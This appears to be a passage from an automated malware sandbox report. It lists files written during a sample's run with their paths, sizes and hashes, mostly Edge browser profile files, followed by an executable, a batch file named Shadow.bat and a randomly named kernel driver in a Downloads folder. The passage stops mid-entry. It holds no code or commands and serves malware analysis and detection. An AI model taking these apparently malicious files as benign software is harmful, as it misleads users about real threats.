5111051171b95f3b8a05b98f0505c3d1127d59a131936021b429c3af501a1871

SHA512
796cd0676d4b9e99bb9d2b8e72dfca9b638f6ec529cdf388c34966f8d0544f5609168b3a8c37d591ce482d0adaeff56a3df5121ea2b89c2a69b44eb07a4fa9c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f6da88faa6857152e74e9ee577ed61e4

SHA1
5c575ef0fa15965dc33a48d8cfe3f527d567430e

SHA256
89674c438d2da51d2cb9d1066c43ecc99b155d9cb77c592c1bce13ddcff5188b

SHA512
935c78308ada1ee589a04997b386badb409e9619eb503d8940571ad8c8b67b13fb21b0063510b9d5c9a7d58a0a079c3de6afd2d31e71efb5a230a936ac70fdc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
ebd317805d7065a4cf742322e502d11d

SHA1
64c4b74ca3916a7277db96881b599fa391e609e6

SHA256
2c5d86b1c8b64ef94a41c68e186f2f9c71147c3207546729af8d27fa4631589d

SHA512
88e7c2f071a0545ba84504b7dc4ab75c521fefd6bf3235706a1709802652327e6a9b61bebccfc13fdb787d6e34c505121ba6b57cd93b9501df2d678913adb92c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
81a38e8c6dfb5c4ebf2c53c56df3ad2e

SHA1
118c593c73177496ba6288981fd1eaef6a9d7117

SHA256
360a0e7af05cb5c222cd8bac5738fb50b1d826fde510548cad5bf7886680f6a9

SHA512
d4a360034d570d5924016f3f3a0c531ac3a93795426dc5249a06a059282bae27502d3d148025fda3f6d73bd5e0c216e78a23641a3bc530d491a2ed983d17732a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ad721b1f2f468f50eb045cdcbd057ee0

SHA1
a889a50d8e456ca24c359e7e7ab15ee7b3e8c3c8

SHA256
a8da163d6b1d80723ee9f481501fcf1daaf10d1f89027b89f0b26050d86f1ed2

SHA512
c3bd69c06fd2ba96edffc91bf04e2717096a50dae22734ed34c598666a7fc1758a35d162a97306b2b3514629f49c74317e2c96007e820028494da83a2fdf2c0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
8a0c7088fe1664b7569f88ee76db2639

SHA1
50c90c2a481692a956e185f39ae8427d9b017874

SHA256
5aaa52c4c83d77c73b66a02dc4e26ea3cf32e7d054ddf90db04cfa096ea201d3

SHA512
68e17a1b7d625dc7945b6c0cb47a9dad0e2f038c5efc6e538d024217e8db64eda373d5c63e8e9de53db8047142f130bcbac2459504768e861d854613c2c05365

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
2d5bce25b869c868ed3455eea8c94766

SHA1
f1ff92dae8cf24b299992c72e9bc202a45897041

SHA256
d85b34f6a6a8c72c297c4e79000c3e5e482a42607203f046e9460828dacb5b74

SHA512
47fddd4a2e6c22f77bc7cd55d87a704234c5c316e1bd7c54e4b4bb0722a8112b917c0b2eb2b24127237904f3ac87ab1631d8f477bf76d54fa0acea19d104d82e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b638e9a1c902f791d678b1cae02fa255

SHA1
4fe7d60d09d4a122a297436d9ca70b8716e34324

SHA256
9ccbee152597a76608021c733bcc86ab950d7e936952b15ea3d785a237a64f76

SHA512
914845ac77a6902d1fce6b4569eb23bba57bc5ee0ddec1e1d42a51ff1d24b4715431bc5f0c513b357e02db15c507023a766ec363a278bae7c6006abdcd23e838

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
917d41e82d2e524e4931424733e8a36f

SHA1
cf81c1597ac24ed27ba478a1d8d140b689c00e58

SHA256
f6ded16bee0c332c5114df796251cc8d867a3d787755a385b141dd5fb02998d4

SHA512
66004327fe2fdbb5ba9d4087d68b15b750cb7deb7e48a241e6ddd319e01bda3da73d56ae43b8311d94c8d460f08a241d95fc561678c6edb09033347f740abb2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
0c9e3833947a7b6fb7fa932fee03755c

SHA1
c0814c89bd8fc84c704619435e31bd41775b56d9

SHA256
82ae8e6dd810b3f4f53d3ae06f288d7a5e37bd0b1af6b1b97acd9bb01dc18fe6

SHA512
8e326c97cb277c93a3dd9246c2ec1821bb6ddf8e2deadcdda87ddac5df7b72553c96d37ad7dd62019617a1bfb6368909b38a9e0c1bac4844ff4a2c9237c905ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
08bc5b158e32365dfd8d3a03b7597c76

SHA1
0484de564315b664894237bf07cf00bd629207f7

SHA256
a7bd1e47f736df5cebdd131cbbc71d024ad3265dbc8df7d6908471ab3006bc7c

SHA512
f7a1452b363152b19f9f109698934e71563925e9283b0f584110c8b7be64405343ecc6dea9e07c73aa2642004551268385f1a69a9d9ea71a11187f04a56a47ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2b4ed86408e158d7d1b3b309c8918470

SHA1
9cb6bd86993747bc3ec00082850caccd1f5071cf

SHA256
ea40752ba7275d801dac38d5de8d6848662ae78168756ce5d0343b36885bfbca

SHA512
acee14eb25e3d333a9f8d1b21fa1e6689e3ad0e7045f88c5019c4d6db6aa8ab03e05b79aa7e29443655cbfacb4feecd505a5541d7582f04a43e01fb0af0701d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b7df6327cd17e67c44a33b5f39d5056a

SHA1
2d96b9ce125ae8043e83f791952a1cc370aa5130

SHA256
65ce91c20db12fe54c8388e1eb9d863cba4251662cbee2e2236eb17d0528645a

SHA512
d4917c266860d93c8c0525a58cab7d8d347d1792a721df7e5d5d800ad426c6063150d4e7b2ee9449688722abb35cd2ab17071ae429607c12d042bc59ca9033ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ab9f84baa4cb611d43b844c314158724

SHA1
d43c63e421ddc93dedf5e00932cd4e8c0c06858a

SHA256
64ae806dede10c6a2e9138ebefe8cb3d58b7debfc27c0dea890394649bced55f

SHA512
5a50530d12e7937e5e779416f1e8def8706458b852c203d2a443abfbb9c7dcde12a00d2504a839ecc261a68878f6f0c6de42614b41e7b947e4b9fbe199afa492

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
89d61335621ee4efb3b71cc7cf30d66e

SHA1
ac13741acab7db691258e63579beea6d41b6cb2c

SHA256
a4ebea47d9e65db18fd60a05683059499cb51b859d1f9e6f23d154773dcc5da7

SHA512
2faa2a560eb2f35a911a55523eba95574e0b0b7a08d5f53bd4b51bf797188d97b1c654102bd208f3ec4282a1aadd0d13d89c182c850fb6dc1f98aceb7962ec4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
9c77e0c66a5a83a7d16bdef9112e7798

SHA1
30829a75e676c1eb06dc0ca9fc75d03bfd0e63d8

SHA256
0666723396444e02b1b97fc88a3d1b0b6933f93494b1cd1ef31b5736661c926a

SHA512
d23ee4586a5d3bb8b675eda9cb9ca35dcae3db0e3391dda5dfe1e9c9c9cebfca4f0736cbb7b0f839c7ec2633df6bbcdd81c1ce478e1dc3db412a49695f1d0438

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
536B

MD5
3f69d8e099bb60cd6d593fcd73298c8e

SHA1
bc96f7f04e2c6cf796df9be58b12a33723f4ff86

SHA256
cd5bd35277dd99168f5c2b192ccfb3155ccc21fb8ad07a010eafa446f9623e76

SHA512
5dd93b6100ba273ce727b93c9231061418a2ab9249c182b893b6494cc02136f6539526c3b3145e819bf9cf9c65b24dc7cb809a3a0915926e88b67fd5bd335f5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
69538e31ddbc25faae229cad9c8aa015

SHA1
f4746bbb46cb184dda1af5c8920d2ebe9fba3c6f

SHA256
8caacdb820970e11ea2cd5c76f9de3022bbd29e616ac76ecdf169f97c4e052f4

SHA512
5d159fb3749566f9d53ee3872f87859751aad7b371742733f1e2838b45149ed759a47aac07c163ea9cd274ef044cd30b8e2fba9a6386e72bc2e7bf67630a7d7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e268e1e407ade33bb29a3f1e12f48de2

SHA1
da89ea6385512150c466dbff5668816564a64152

SHA256
af4f8020e8f2e3e99456b20c569fdd2c2d15fc80f25f3e19d4a0b73c82469f52

SHA512
9e4757becf4599fb2009b212f1f5aead34505090bb5d2cddb466f5c686a1168540e90ff73a0fb5548d2b0faa73775ce111e674ccd254a799ead444d0fd23fd56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
97d3b9543c9a39062e9825d09b0a395a

SHA1
e8cdb8c9020952d2f7b990ce7ab1bb258e14ffd1

SHA256
0c2fd227bcedc56290ea8e0a7e908ca5494d2377691509ec4147ce157182bf2f

SHA512
c01ae5a29b7dd082731bb43b83b90e6b877ab45529bea93b05f8fa26c82c448d9cf6a7df12355d598c13358833f6a9805568c06fb58b74b4a48cc9af920a8102

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
240e4ded34213104266f4810601f99ef

SHA1
075351e43e248d1e20a5d3931f7fb59dd170b409

SHA256
e9dcbc281fe7405beea37ad57e8e8b0b4c2fd55cc2a8e635f9e8a3ab3b5ca00e

SHA512
c616091ea7474b4d65ea048e116f094ceee46afbdaf0d576102143c3457fbcba7807cf7609c66d1b033c35ecacd16e349b41f22446ddf1fd1fd5e826e1e55f10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
f4d78f5b184cad9fe9af6a3599defd31

SHA1
e821beb800d45b55171dec0a271dac47689f5520

SHA256
c323c816cae51069eacd007a70bff9e5f271b7cef930cc11f7adb9cd48b61bc9

SHA512
feff042e7c746e908c11327fa90a27853a66ba8bfae78cc6bbaf58117b8999d1fe7845d6ea4c7e591f5e3f84a38e481b0994561b18553a057fae6bb304f27835

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2402948d1b0da90a4e91a85669036a57

SHA1
57f227e489b9815eb04a88734f6f7da8c3f6a14b

SHA256
8cffaa3fa120a208d450e67ce617a98e4d4795703797fcd85c4f811505fbca3b

SHA512
21af40c75a60f9bbf1076f61ee3c68b05749ea6b0419e7269e47b92e9c5175bb72fc9126580b1fc2defd2bbe702135dee491c1b680d780c27906eb81dd0643b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
17906bbb650d356144c10c915cd03ba6

SHA1
bc038896bfe6e707b180e78c2df148fb73e20ff4

SHA256
9ee59684e39bc1446391b41c2c57dc5e6ca67105af791a3fb149383ab2dd30c3

SHA512
16f4c53fecb4a0929497a06de5fb2a306ec2817b1e2052cc4b0c15468152ed70bccb9be9ebfa9fdfb55606763f4fb534a939557d7d7e07021292e02e28bb2e0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
60292b8502b4a85b3ad8e74364bb27ea

SHA1
19f8dd18b848bafc63615cc7e95068ac46f715cc

SHA256
effb85f62ff819496fc8dd58f74106dda09f480f78966548c50f33d81305be1b

SHA512
13d0e803f9769d7c89e6b396dbfc3e380d0c1c70fba795bf29052d83fa073ef00afbdfae6005f7203e96dd592fe1bc2b242b19ee86e0a4b8ad61e7bcad052de8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1824e538670d377f7670ccb175bbd346

SHA1
4f51632bb545436ec23de617bf0cab2f85d7d389

SHA256
a024366897e7a809396ee0cd2a8fc246ecdacd865a2287fac58e79eb46ed0569

SHA512
f81b44523c3eb1ab479a91efa7c25e0704041d88ae519adf925aa0784662b2e285da552f2b07829844bf252ed2f373918f1f8a7d588bbcee7f81ce39d9a721b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e460f88c1c3c4fb7012232a05aae12f4

SHA1
3bec2143e82ec7d79a533b77e1a1396f47906e54

SHA256
a41a84404d6e9ecf91a5245cbf290f110bda2b8fa33e8756d408eac05be3cfb2

SHA512
ea6ab271a5af527db5f6e576a2efb54763c8e61e7742737ed83c4f21dc85a00c6639c02b071df5d1bc7a2191a9c202fc0522cad8c3838bb907b625977c4c2f41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
037d306401e488821b407551c5037618

SHA1
4177ae7e95056c1e0c942bd13dbfa6209df6c690

SHA256
553e25026072ee3229f3b284b56b471197a7f985aa176cdc04aec8fe07210d86

SHA512
d26f03eaab0100f3da2141ded32dc1619d9c8eedebc58adde698788354169ca79a7d91688c8f3ba1756f10bdf0c7990fc658c5ed8a35fbc5066648affdd6881d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
c98c38976e49b9f1c52801de4132d3f8

SHA1
f8f5b7bd85eb759895c4226f8816b8f8099381fc

SHA256
82b0d6b7695468d17c8240618cc85bdf56dd597bba9ef6725a58d110acc02ffd

SHA512
092926b74943ccd92be3dee7e0c10f31d8ab5c6c28a8cf8d6e6035dac53e3db59579a62af5354660e6df8c48f344c47cbac1ef5197b8151b8f8206ce3fa52cfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1f1fa48272e818aecc33f1bc8f7a271c

SHA1
fd441fe2ba0497dcc12b482b0240be93c7700c54

SHA256
d9527d4002d2bf986db8be4ee909ac64850ecfda919af19eeead580f12f230a6

SHA512
c7dd2d4652dee7dc8881b2c8196ef971bfe8f78183789d4620d0baf32638922116c57191b4bb6aa2d5612b910e16a3e323ce32b958657e011286585621c55d3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
3b23c99f61e78bdb59e6928aff2f86df

SHA1
ea0b2abaff8fde58eca9c707ef9c8a5e2fb40083

SHA256
9cd7db825a7f627c8b6a4adb7bf67e82ac4b873329e9cab817c95418357ab6f0

SHA512
05066455c98b20e0dba4dcecba59125fc4c503aab724ded7f0aac4b06db52966d0ecb885ef406cfd061f2b6c6bb367de075719ddf8fdceb872557d1066227a3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
73f185d1a6d7d484dd0563f1b089f42f

SHA1
e57430878d676c1ba9e2864d47d4d52aab02c429

SHA256
249ec39aa26cee0e7228cd325e03d995bfb1da433b7d94f071bca43f9dee1766

SHA512
f336da415e462cb0264ff172eca2d9eb4a6d9b9c7e6954cdc0ff86090b8812fa077288a34fcce1d1fc5c299aa0bdd56c03f9493ac7cf17eff17fe3a1b645b2d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
fd7d26154fae4e85b0d5c131eabc3368

SHA1
890c9ec8f4b073733905af3caa62b2d9180b88e4

SHA256
7b237a55a0db43d5ec524ec577e4442a45418dd8a9c0c09a961e83061bd99683

SHA512
45c018c1c7672a913ebb117dd6b5ac5dec1576481069823eb4880a5da9c77fac8840b39e119c684cfeb1bc4cf61175e250b2959c39ce375124f49f17de9b10df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5882a8.TMP

Filesize
534B

MD5
85a74c78c4860f2eee0aa21086942334

SHA1
64589121eae9db177bb94e9b9b4cfbd668ac4898

SHA256
75a4c0bb622df4d005aefeb6643519c39814f4bb086ae07bf261dedb5b2c5da1

SHA512
099ede7d20589f4cb03093c9fcb972f0cb8a0c4561d2ebf58c9e81486ee6e7aa0f0b0dc22d2b6fff6773c833ab641925fc2e055f2e69e7cc7ae52e998b2fc6b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a3052d35-bd49-4bda-8810-399d749e9557.tmp

Filesize
1KB

MD5
ba8f08f2bef4d636adbd40e8bf18911c

SHA1
328ba1edc5a9f9653f0ef10370f70818dd7ee518

SHA256
8b71a0f105e0460df0c4216042875c0c51783c48ebad0b478e877c62ba638fbc

SHA512
87f50227e2e7432fe37d8aea2e4d25660c1d7da852d13af2e31072d480310cc37d820cae47294b0383a041eeafb50253bb3aa9eb28e7ba4b71474ed8508067d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
be208a14d72e256e41d8b68d9c8e1843

SHA1
b19aa54735be205b23fca0eff480421a5c8a3c93

SHA256
7d2e1d03c377fd562b0693cce95333f0b441f248696fd11c7d327e754a1f770b

SHA512
bd6dc1dae57c4f74335c25cf2624b761928b06e7b2011354749dae39a1ba47c1cfcf7cdc8df47cfa033c6e324c3cf1327391e45ef7522f4d9f06305ed722e022

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
8065138ea7cce3c23bb9f55995144d92

SHA1
4ed7b4cbab309329e29b36d4f5b6f959f19a8c5f

SHA256
17b73c18e29f93e3eeceb26902c24acc8cc4b715702fac3b1de00d6725e38345

SHA512
06228d9948634461bebad9af0251316f7c7c7c3f4c8668d4b5e0ae56c8a7b1575000802c382326eace54d2fafd9a632b0383a6c00b65e8c0f8c8d28eeb7794e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
12804e7e0a674822c191cbdb72fa8218

SHA1
b244a59608b9b0a13c914d027d3fde5e20c70fa9

SHA256
df964da1cafd9be9f0848f17566d4558014ee2413bd56b2fcc4dae93db86c140

SHA512
b15e426f7d6e21020a6fdaecf55cd6b36b4928ba5c7752b674e99d08ac2ddb785d1caaa3a81c69e4dcebf09adb36adbadee087ab8a82f88b231a14bcf59bdf6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
63b2f77218901c963264faa839e6ec7d

SHA1
a868debb53343dfce16cb4a81f7aa80bb07bd4a9

SHA256
97903a1cce82cf394d3ee8cafaab3cdfaf405b1771884067182954f2f7238874

SHA512
0450be5584282188e9c76b567a169b69a1532ee5335c925a649c9cc47186b2409e4d3f4eb0047db7918bb95176d91c6897b95e3a11385c6134790082f262a0b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
e4c266e0d9ab2235001aa7f27e7c5379

SHA1
0bf8cdb7f6ac783c272b4c9ef6b5d1ae0e10506a

SHA256
16a22ce81d137216e24fb58c1f7d0471c1c8631f16d85872ca35338e97603329

SHA512
0fe79531e867ac8612487d4ff223ccfc363164af7312a33214ce28d4b868bad104f6d00cc432e812c1ee64660e0ef5aaa18562182004449bc201f86ad3072d43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
b94a72c5d0b8ceabf0d6c5cf9a853c39

SHA1
7df17ff143d38d2f2c0033ef636b1574b4cccf2a

SHA256
7d7dba0a766eca59794a084fdb753db2fddd9ecc3046db746eebc3e769e94a44

SHA512
f73bf91873f502a7d124009d4ba587f2d7ba7f6e58176bd32d1ac74bacb257c5e47677cf53e0c0a267ce27d33240895b6b0e497c877d944cf0135045239f3b81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
4802eed8ae6288024db86487331594b9

SHA1
4830268b9d062c3f7c05791cf9fc199e07106cfd

SHA256
0e575358797d084a306b9fe27a04f508ef8bfdb8172e8403b3aa85df6ae324a3

SHA512
a3f14178de92a10a6412eab88d0af7d7f0bd564216cb56e5d5e145d1ce27051e907cae5a4410a2436e18708672245f49b419eacdaadfd4bcefeafd262cba33d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
a43c65a9f0ead129465cf9c7570b2cbd

SHA1
bbfe5e95152faae183ccda68b576376d11734382

SHA256
921c6c2fa910d61428c75ade6f8d8b1ea9df77a43a290601bdb2902a7d8a90f2

SHA512
d5b7dcdcd78f420e851f7412f3397e775c160679ab278f5f923dcf25246c3b2f58a0e23c0090ddf636a861baabc7c8ed53946c09568020d615cd91e3be2e4aa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
9e895a2138d6ea4b525b6baa3fe676dc

SHA1
85cd80e15916bbe1694645af84f1065e961b3858

SHA256
0f5fea02c4eb61c4fc8e514b856719ca0d61f848180cd92456c991602b8db768

SHA512
22c9dc00019b711f4160faae30cd249d066e3290a71519b75dd4366dbbf4ed733d2b89bb8fe2cad868e7802dbf4fcef79b81a882526a35ed17cb37e74093b5e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
82b20bca5873f0cd584cb5c65238a18e

SHA1
a6c86957cbb62f8e60d405e350df0549e8569ba9

SHA256
015275cff2e115a5cad4297d02920c6d70286a24be856354965eba5cfd0d3c16

SHA512
cf99d1391fe2ecb6814fa5521b8269a91b2ab6a8003f2282df135a1d6787d89769ef3ffcad6c6a28a111cff239edbe0bd732391b14793bd5ae45c130aa48d88a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
12KB

MD5
7e570e53a04c892256c63fdc2e674df4

SHA1
802a5962c2c5ca894c83496b515dda0e7c4568ee

SHA256
35436e7459d43e8b3fba83e66c97447cefaa6df6d357438e2765136b167d3869

SHA512
23662259581f3eb492066c77c07dcc210b4a5fbc56c4a5793e68e7544467a7305ca0be31fd1fbff3ed089d222314fe970692e81110c911bd71e5468c9ad9c247

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
14KB

MD5
f0046e4c90d49397f4ec3d6611e45a5f

SHA1
572d41e4dff35ca65c86fd36ddf5dcdf85be8c28

SHA256
82164f40668831007293b2841647dfee9e675e4256c4b8ac23bc4f90efa3ff4f

SHA512
614b9ebb43bc9d564d2d29baf2cfcc9fcfae4e34cbf19948747c8fe698334f972e7525aa51749c36353215dba648ce4066606254c8935aab6f38c7f65db5ebba

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 167302.crdownload

Filesize
414KB

MD5
c850f942ccf6e45230169cc4bd9eb5c8

SHA1
51c647e2b150e781bd1910cac4061a2cee1daf89

SHA256
86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f

SHA512
2b3890241b8c8690aab0aed347daa778aba20f29f76e8b79b02953b6252324317520b91ea60d3ef73e42ad403f7a6e0e3f2a057799f21ed447dae7096b2f47d9

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 324659.crdownload

Filesize
315KB

MD5
9f8bc96c96d43ecb69f883388d228754

SHA1
61ed25a706afa2f6684bb4d64f69c5fb29d20953

SHA256
7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

SHA512
550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 502618.crdownload

Filesize
11.5MB

MD5
928e37519022745490d1af1ce6f336f7

SHA1
b7840242393013f2c4c136ac7407e332be075702

SHA256
6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850

SHA512
8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 672833.crdownload

Filesize
68KB

MD5
bc1e7d033a999c4fd006109c24599f4d

SHA1
b927f0fc4a4232a023312198b33272e1a6d79cec

SHA256
13adae722719839af8102f98730f3af1c5a56b58069bfce8995acd2123628401

SHA512
f5d9b8c1fd9239894ec9c075542bff0bcef79871f31038e627ae257b8c1db9070f4d124448a78e60ccc8bc12f138102a54825e9d7647cd34832984c7c24a6276

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 702275.crdownload

Filesize
424KB

MD5
e263c5b306480143855655233f76dc5a

SHA1
e7dcd6c23c72209ee5aa0890372de1ce52045815

SHA256
1f69810b8fe71e30a8738278adf09dd982f7de0ab9891d296ce7ea61b3fa4f69

SHA512
e95981eae02d0a8bf44493c64cca8b7e50023332e91d75164735a1d0e38138f358100c93633ff3a0652e1c12a5155cba77d81e01027422d7d5f71000eafb4113

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 792627.crdownload

Filesize
321KB

MD5
600e0dbaefc03f7bf50abb0def3fb465

SHA1
1b5f0ac48e06edc4ed8243be61d71077f770f2b4

SHA256
61e6a93f43049712b5f2d949fd233fa8015fe4bef01b9e1285d3d87b12f894f2

SHA512
151eebac8f8f6e72d130114f030f048dff5bce0f99ff8d3a22e8fed7616155b3e87d29acf79f488d6b53ed2c5c9b05b57f76f1f91a568c21fe9bca228efb23d9

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 963901.crdownload

Filesize
211KB

MD5
a933a1a402775cfa94b6bee0963f4b46

SHA1
18aa7b02f933c753989ba3d16698a5ee3a4d9420

SHA256
146581f0b3fbe00026ee3ebe68797b0e57f39d1d8aecc99fdc3290e9cfadc4fc

SHA512
d83da3c97ffd78c42f49b7bfb50525e7c964004b4b7d9cba839c0d8bf3a5fe0424be3b3782e33c57debc6b13b5420a3fa096643c8b7376b3accfb1bc4e7d7368

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 963901.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\ac\EVER\Everything.ini

Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\Downloads\ac\Shadow.bat

Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\Downloads\ac\ftefbvnfkmpdzbmx.sys

Filesize
674KB

MD5
